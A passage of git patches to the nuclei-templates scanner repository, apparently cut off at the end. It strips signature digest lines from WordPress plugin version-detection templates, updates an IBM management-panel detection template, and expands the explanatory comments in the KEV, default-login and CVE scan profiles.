4b0a00483046022100d6fd87987412374ac4b21c89ba29ddc1552863b7d5939368ef8bc57a3f77a3fe022100ed0a03dcc643174dbd890cca7a49c963822db666e48da2b1dfd31bbfd3933dcb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index f2a96eed96..03ddae57bc 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a32848dc7515ec675cf69580a79eed387b18458272d34ea1bc6b7fd2a305b73b0220567783f988c4c75351fdfa04267eddb19b997be024371ce7c039bcdb5efc6b08:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index dec6a4be85..d6449bb5bf 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022079f38cfb5d5d55252e7e99d1b6ee84ce76dc9ac2dc14ebabedbf127eaffbe8bc022100afe4a6c6253444c08e3f2848b1e58985fb531c7568223b22c083d0d3ead8fe5c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 97aaa23773..2d5fdf1779 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cd3c7d28976237f9853502b43cff74787673f9cc2c9572ac7445810e8a5fb6a1022100b4c3ec73cb0a2b9edfe3e8d30fc2c93e507cedb01823b7e455cabfecdc94b391:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index b4f28b2f10..6b5705e20d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009ab20299c4ccb6c2d7229e1dbf3de5fd034c3445d15e4422551ab2d1c351480202200db582532d018cd6fd9fbf31e06d53bacf78be1c0e32bb10ce74bb4ce9d30216:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 2da434f498..fb9ea502ce 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220443a444fe04123028a6e2c046d1625ddf3828f09087111a34f80be65a486717402204c48c9d73613c31a3f12689df0fcd30054915a880ac0e900b0a6bf45f1e67ea6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index 6c5f1556ea..a4c9f2c7c4 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204a80c49a0fad0e1ac287eef673dbacfade5ee5b96a6d1f6ebd3394f0be62d6cc0221008dea2e1992236a95f0d69f4f3a64f63d362f93f33b2afbcad1f6a3f089dfc04d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index d65b23eb44..1fd49d2e08 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f327ebb92c6fa02c20264e9fd17e58ed28eb5d5a039f371c0af5a2dead0fdbd502210093d31bc82a839316dbb7ca2d39243dd9f5888f6628d77154d024072e136f7ab3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index aa16b2241f..4fa6fc3ffe 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022071542ffac214eacc8f93d4bc2bfc3985d30759a9f01512c8f1d8719b122a3a2f0220549e0b8519beaecd9f904a5f64da0501207760d1721291ac73035a3be046a8a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 0982feef3a..1c1c690fcd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008885e75a521639c9a49f154a694ad1298f7376d6e769d2da103c883160dfbd95022071d4f02ada036ce718b6d90eb1b550d5b5b3ac7bd10416f73dbb2f17d034091e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 0bab6bf27e..4d6702d81a 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022058213f490f32080436ef813589fb86e54bd13e8e0218de4a3fd89a06dde5b6c702202c37bebbc2885c375b1b627d40f379b268b087a00f763a077293504ba8b280ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index 30d790bc13..42cb8bc409 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201e76f353338aaae38e434658acbda2ae9a972290ea29e4a45a196669d6c004c802205db826813b2796d1b408d0817c888d47e0d9d0ac4759d6d8e78d083af0d7189e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 5e13c69f6c..55d6effbf5 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203d9f80756f413dc139bea4d3bc732713cce79d9aaa206df7f0fae9555f4973e7022100fd24391f392da96fbd681ccacf5de9e5d08833c98c2311245f1c13ee1b75cd38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index e408b79e01..6786cab703 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100df0fdec73bee45861fd872eed2777a3531fa1659e6a58e09d222351b30ff18a402210087ea4a197d3e0205665b1b8ef7844bfb40170c038741ff26f34c16a1419fb039:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index bdddab7453..784ba22c8a 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100df412f0b29f9a8b3b32255987aa4e098111579cd1d10c8ee68bdb59460601a1c02204160bad8924f0e4e64d9d6d071b6214c9c8688f4932eae59df178b1f5e16128c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index b4470c755e..72ff55e58a 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f23ccc5a277856b768bf24790182c4a25103b2e759600194a9868fd389f6577002200fa3e5b43294653d854ab7e11383213c2c5fcc3eed6a7ecc86291a295c99ed92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 08e0018000..8cfaa0f5a9 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200bac842aea75d6b886c9fbdb56000670138ad31f39ffef2817d7031a9e4e7c4e022100ca9ff14cd0bfd7c327cb0b04cf56682fcfa72752d8e333d9ae855523860553e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index 831858fb94..85900a01a7 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f21ccdd18b0ff3852849ea2a042b6f4011bb865d220e33f30b77eb29f005e36a02200f037a3cdc109b397044ef7109446b6fa7279fa8415100a13928afa263a2ba66:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 8a9b06e5d1..a7ccde0b49 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b8d26a14aa1f2c863dbbe751252a0249474b9345fd673a5ab1bd2453932c5260022100959c276851a8197233f85925f8eac6516777c4c78f16d82913916b5135c0c871:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 90145e4a86..422664a98c 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009eab7e1f1006947a95b4b084fb75d95c497da91de193c39efd000e931f8a39fc022100c0870b5a316a727452e6aaa7753d56b10335634a0f907f81eb2ab1ff6c2a8318:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 33226f5242..f0af3a748a 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100aec3d5c340b46a36502e03203197711c2e9d608808603c6288a0afd0bf23ed04022068c5692593a121ac7272b5fbfadca8046e81b7e1c4508641ec5037c6739ea197:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index 7e65414e85..f89f1a20b3 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205416664f2cdcd0118da80bc613e191dc5ea1d561cbb780c276456839b24b47b4022068709d3ee0e926fe9d84f522597d62b89c92b3f0fafab496b1ae50d27f5fe068:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index efbe25a90f..01fb12d0ad 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207c55e45e7af7a6138681290d8ed75617bcb961ed87c5ee20c51ce8235bf63423022100ae847f47b9bc70a6e95ab5390b7666dda7a9fbbe9ad74369ab822f6d34c674a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 0ac1c54ef3..34115bcd0f 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a7d145657518e6fba7ef617a0fad9cef635bb83346370c5ba6b0a4d9c4f348cf022100aea77fcc2bcf5af9939bcb10611d8eff093a5a5b9730f0b45a4595b59e25611a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index bdb8f899e1..bcd1509c68 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100bb7d518530ffa006192a55bba765d5bc1534695243c74c6a2b5a1dd338b7419d02204060f14292677d6be7076a09bdd248e284ff3b98528751ec98f632cbaa6d14e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index c6198742e5..c6aca20a60 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b44a5772bfcf4c6aeb0c7cc2badf9b36a226f0ac323b7c97968e192035ae711a022022a5d5e15da9316fea4fd85bdfc377e46a2ae9aa45adb6f7dada09e7f01f9c3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index f444532799..56dfdf4a59 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fb75599e9fb877da457f66f0ef5053479123ce721606b6e6e6580332e1b4f61d022100d91c45e22936a9bba93e918ec3cd5eaa0aebc305ab918032ae8ca96f323c6d1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 3d258946fd..c3ec4ebd80 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200cb7f0bb682f9e649208a55ac46747a2b010f0db741e9c32fc35b0e3218aea9102207988a28783ec2845beb066c71449f4a37f6f8c492e1a9900714b064189383d3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index c32e6560d9..2276545093 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210087ca52b913210a80af8997f24359ee7b880d08aad92f74b87a340d62edf46148022100f5bf0905a2de56cf30965e65ab463457ee1f7d2099971084bfae433e248f0ddd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 7ef19e4099..783d381ed8 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022032a8f6687bf25362004c2f28fae210f399ea97be2ea60a19bf0e1d00e9c3ccb70220376a09276067f63536c1e3eeef47ca9c7cee75f43aecf33d8b7e962227b42bca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 73e5df3c0c..7b28bf7020 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d08fef85e4a20c69cbbefa4ebbb65e4c2464c8aa70ec0278f76da9de20de3246022100c431e14c2f68a9b8e8f84a1d37745445ee2b4812e020f1b3e2435611682a444c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index a000e1106e..da6abc2a81 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022064954895dab0b6b9b36162d64b94d1a8acba227669a4691cb3798cdea39deea9022100c71e1fca49de36e4286eb385c98515eba489b212d6a43586328b785593915f9d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 3db10ba633..5f6fbc1f75 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022046a7f0c0b57cd0481506b1699179a608b01ffd40e1da5acaa85f809c31a3aca3022100e92d72755499a916bdde3ba9b78d8c44554519a9059c4c2dd6303c673e71d651:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index 64a03a1922..beeba7ca69 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ec039257d787af69c95d795b2a20b32b3a432862dbb8f7e1258a0419996a748f022078f7d6a0b343fa518be7f0a7630509ea655e3e82d29bfef2a57c6119a06507d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index cb8f5084c3..c225df7bfd 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fb871c5d75ad1a817cdaf27ac73d979ed76cd14ece305397b3de16c2328f0226022066881a199268b47eddaa54a95e5470fc6da8d3d30add05a3e6b7bced84562f35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index 4c4a7ed8af..aaad04cb76 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022068508bc9cb0f17f8d53de554247221952f2c79cafb757ef54b4c03f52620f45102207a2c525409f2846d1d993d6bf7de6991e05ef324c0f25bd25b6081df2c9915d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index c3e27b1b06..ff750a7d2a 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220369f5ed965d2d84468a8a0632e085356f6383f4ec24caff37b1e4802d528190802200edba397a3db7a080a1c3fa342b90e46e2480f30f1c4b51b49f48f28e61058f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 739906e60f..f1e7595ccd 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206498556a7cef761b4630677adcb9ed392911286913293d3a2ef545d8c8cc704c022016b3262c01248a5b88436af9e427948f634def9f3976d64d51e737d0545f118a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 3c76cb8bb3..4b2769ee46 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022047af4995c8b7da5eb0036d95775a0efef4b0dc167ab385d4cfd0d09bc1ab58b8022100d8dde698cc10a10cb0b8039bf2688c80c2012177d6984b961d465ba1c8796c71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 656b896a316a8234d6476a75905ec7246bf0baa4 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 25 Jun 2024 11:05:04 +0530 Subject: [PATCH 0552/1841] added req --- .../ibm/ibm-advanced-system-management.yaml | 9 +++++++-- 1 file changed, 7 insertions(+), 2 deletions(-) diff --git a/http/exposed-panels/ibm/ibm-advanced-system-management.yaml b/http/exposed-panels/ibm/ibm-advanced-system-management.yaml index 0a61fbcbbe..6d575f9b17 100644 --- a/http/exposed-panels/ibm/ibm-advanced-system-management.yaml +++ b/http/exposed-panels/ibm/ibm-advanced-system-management.yaml @@ -11,18 +11,23 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - max-request: 1 - shodan-query: http.title:"Advanced System Management" + max-request: 2 + verified: true + shodan-query: title:"Advanced System Management" + fofa-query: title="Advanced System Management" tags: panel,ibm,login,detect http: - method: GET path: - '{{BaseURL}}/cgi-bin/cgi?form=1' + - '{{BaseURL}}/cgi-bin/cgi' + stop-at-first-match: true matchers-condition: and matchers: - type: word + part: body words: - 'Advanced System Management' From ca0bab2171f1a276070fe9e4e0bd345270f66e9e Mon Sep 17 00:00:00 2001 From: Parth Malhotra <28601533+parthmalhotra@users.noreply.github.com> Date: Tue, 25 Jun 2024 12:05:54 +0530 Subject: [PATCH 0553/1841] Update kev.yml --- profiles/kev.yml | 21 +++++++++++++++------ 1 file changed, 15 insertions(+), 6 deletions(-) diff --git a/profiles/kev.yml b/profiles/kev.yml index 8c3d6f8ff9..6b43543cfd 100644 --- a/profiles/kev.yml +++ b/profiles/kev.yml @@ -1,9 +1,18 @@ -# This is a configuration file for the CISA KEV template profile. -# Additional configuration profiles can be created for different types of nuclei scans. -# They should be placed under the 'config' directory at: -# https://github.com/projectdiscovery/nuclei-templates -# Here is an example of how to use a config profile: -# nuclei -config config/osint.yml -list target_list_to_scan.txt +# Nuclei Configuration Profile for CISA KEV Detection +# +# This configuration file is specifically tailored for detecting Known Exploited Vulnerabilities (KEV) using Nuclei. +# +# Purpose: +# This profile is focused on identifying vulnerabilities that are listed in the Cybersecurity and Infrastructure Security Agency (CISA) Known Exploited Vulnerabilities (KEV) catalog. +# Detecting KEVs is crucial for mitigating risks associated with known and actively exploited vulnerabilities. +# +# Included Templates: +# This configuration references specific templates designed to detect KEVs: +# - tags/kev/: This directory contains templates tagged with 'kev' that are specifically focused on detecting known exploited vulnerabilities. +# +# Running this profile +# You can run this profile using the following command: +# nuclei -profile kev -u https://example.com tags: - kev From 56247c8e5e011939f887687e4a11c73b24509f93 Mon Sep 17 00:00:00 2001 From: Parth Malhotra <28601533+parthmalhotra@users.noreply.github.com> Date: Tue, 25 Jun 2024 12:08:40 +0530 Subject: [PATCH 0554/1841] Update default-login.yml --- profiles/default-login.yml | 24 +++++++++++++++++------- 1 file changed, 17 insertions(+), 7 deletions(-) diff --git a/profiles/default-login.yml b/profiles/default-login.yml index 4350b23863..f03ef73992 100644 --- a/profiles/default-login.yml +++ b/profiles/default-login.yml @@ -1,11 +1,21 @@ -# This is a configuration file for the default logins template profile. -# Additional configuration profiles can be created for different types of nuclei scans. -# They should be placed under the 'config' directory at: -# https://github.com/projectdiscovery/nuclei-templates -# Here is an example of how to use a config profile: -# nuclei -config config/osint.yml -list target_list_to_scan.txt +# Nuclei Configuration Profile for Default Logins Detection +# +# This configuration file is specifically tailored for detecting default login credentials using Nuclei. +# +# Purpose: +# This profile is focused on identifying instances where default login credentials are being used. Default logins can pose significant security risks as they are often targeted by attackers to gain unauthorized access to systems. +# +# Included Templates: +# This configuration references specific templates designed to detect default login scenarios: +# - http/default-logins/: This directory contains templates for detecting default login credentials in HTTP-based services. +# - network/default-login/: This directory contains templates for detecting default login credentials in network services. +# - javascript/default-logins/: This directory contains templates for detecting default login credentials, the templates are made using the javascript protocol. +# +# Running this profile +# You can run this profile using the following command: +# nuclei -profile default-login -u https://example.com templates: - http/default-logins/ - network/default-login/ - - javascript/default-logins/ \ No newline at end of file + - javascript/default-logins/ From 702ebcf4bb57fa886fc935c044225e57e753eace Mon Sep 17 00:00:00 2001 From: Parth Malhotra <28601533+parthmalhotra@users.noreply.github.com> Date: Tue, 25 Jun 2024 12:54:21 +0530 Subject: [PATCH 0555/1841] Update cves.yml --- profiles/cves.yml | 23 +++++++++++++++++------ 1 file changed, 17 insertions(+), 6 deletions(-) diff --git a/profiles/cves.yml b/profiles/cves.yml index 265cf0ea45..9fb0523b57 100644 --- a/profiles/cves.yml +++ b/profiles/cves.yml @@ -1,9 +1,20 @@ -# This is a configuration file for the cves template profile. -# Additional configuration profiles can be created for different types of nuclei scans. -# They should be placed under the 'config' directory at: -# https://github.com/projectdiscovery/nuclei-templates -# Here is an example of how to use a config profile: -# nuclei -config config/osint.yml -list target_list_to_scan.txt +# Nuclei Configuration Profile for CVEs Detection +# +# This configuration file is specifically tailored for detecting Common 